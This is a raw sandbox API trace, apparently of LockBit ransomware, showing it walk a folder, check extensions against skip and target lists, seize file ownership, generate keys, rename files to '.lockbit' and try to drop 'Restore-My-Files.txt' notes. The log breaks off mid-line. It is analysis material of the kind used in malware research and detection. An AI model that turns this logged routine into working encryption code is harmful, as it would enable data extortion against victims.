[0077.647] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0077.649] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.649] malloc (_Size=0xc2) returned 0x1ff1e60 [0077.649] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0077.650] free (_Block=0x1ff1e60) [0077.650] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0077.650] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0077.650] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.650] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d6b554, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70d6b554, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cec0f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x4f6ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyMainBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0077.650] lstrcmpiW (lpString1=".", lpString2="BabyBoyMainBackground_PAL.wmv") returned -1 [0077.650] lstrcmpiW (lpString1="..", lpString2="BabyBoyMainBackground_PAL.wmv") returned -1 [0077.650] PathFindExtensionW (pszPath="BabyBoyMainBackground_PAL.wmv") returned=".wmv" [0077.650] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0077.650] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0077.650] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0077.650] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0077.650] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0077.650] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0077.650] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0077.651] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0077.651] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0077.652] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyMainBackground_PAL.wmv") returned 1 [0077.652] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyMainBackground_PAL.wmv") returned 1 [0077.652] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyMainBackground_PAL.wmv") returned 1 [0077.652] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyMainBackground_PAL.wmv") returned 1 [0077.653] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyMainBackground_PAL.wmv") returned -1 [0077.653] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyMainBackground_PAL.wmv") returned 1 [0077.653] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyMainBackground_PAL.wmv") returned 1 [0077.653] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0077.653] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv") returned=".wmv" [0077.653] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0077.653] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0077.653] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0077.654] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0077.654] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.lockbit") returned 90 [0077.654] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.655] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.655] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.655] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.655] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.655] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.655] RtlFreeAnsiString (AnsiString="\\") [0077.655] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0077.655] malloc (_Size=0x200) returned 0x77d800 [0077.655] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0077.656] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0077.656] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0077.656] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0077.665] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0077.666] CloseHandle (hObject=0x3a0) returned 1 [0077.666] free (_Block=0x77d800) [0077.666] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymainbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0077.666] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.666] malloc (_Size=0x40068) returned 0x1ff1e60 [0077.667] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=325322) returned 1 [0077.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.667] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0077.667] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.668] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0077.668] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.672] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0077.672] malloc (_Size=0xca) returned 0x77d800 [0077.672] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xca, FileInformationClass=0xa) returned 0x0 [0077.672] free (_Block=0x77d800) [0077.672] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy") returned 1 [0077.672] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt") returned 73 [0077.672] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.673] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e03ac8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70e03ac8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49d12255, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2279e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BabyBoyMainToNotesBackground.wmv", cAlternateFileName="")) returned 1 [0077.673] lstrcmpiW (lpString1=".", lpString2="BabyBoyMainToNotesBackground.wmv") returned -1 [0077.673] lstrcmpiW (lpString1="..", lpString2="BabyBoyMainToNotesBackground.wmv") returned -1 [0077.673] PathFindExtensionW (pszPath="BabyBoyMainToNotesBackground.wmv") returned=".wmv" [0077.673] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0077.673] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0077.674] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0077.674] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BabyBoyMainToNotesBackground.wmv") returned 1 [0077.675] lstrcmpiW (lpString1="ntldr", lpString2="BabyBoyMainToNotesBackground.wmv") returned 1 [0077.675] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BabyBoyMainToNotesBackground.wmv") returned 1 [0077.675] lstrcmpiW (lpString1="bootsect.bak", lpString2="BabyBoyMainToNotesBackground.wmv") returned 1 [0077.675] lstrcmpiW (lpString1="autorun.inf", lpString2="BabyBoyMainToNotesBackground.wmv") returned -1 [0077.675] lstrcmpiW (lpString1="thumbs.db", lpString2="BabyBoyMainToNotesBackground.wmv") returned 1 [0077.675] lstrcmpiW (lpString1="iconcache.db", lpString2="BabyBoyMainToNotesBackground.wmv") returned 1 [0077.675] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\") returned="" [0077.675] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv") returned=".wmv" [0077.675] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0077.675] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0077.675] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0077.676] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0077.676] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.lockbit") returned 93 [0077.676] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.677] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0077.677] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0077.677] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.677] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0077.677] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0077.677] RtlFreeAnsiString (AnsiString="\\") [0077.677] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0077.677] malloc (_Size=0x200) returned 0x77d800 [0077.677] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0077.678] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0077.678] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0077.678] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0077.678] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0077.678] CloseHandle (hObject=0x3bc) returned 1 [0077.678] free (_Block=0x77d800) [0077.678] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babyboy\\babyboymaintonotesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0077.679] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0077.679] malloc (_Size=0x40068) returned 0x2031ed0 [0077.680] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=141214) returned 1 [0077.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0077.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.681] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0077.681] ReadFile (in: hFile=0x3bc, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0079.087] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\BabyBoyMainToNotesBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD 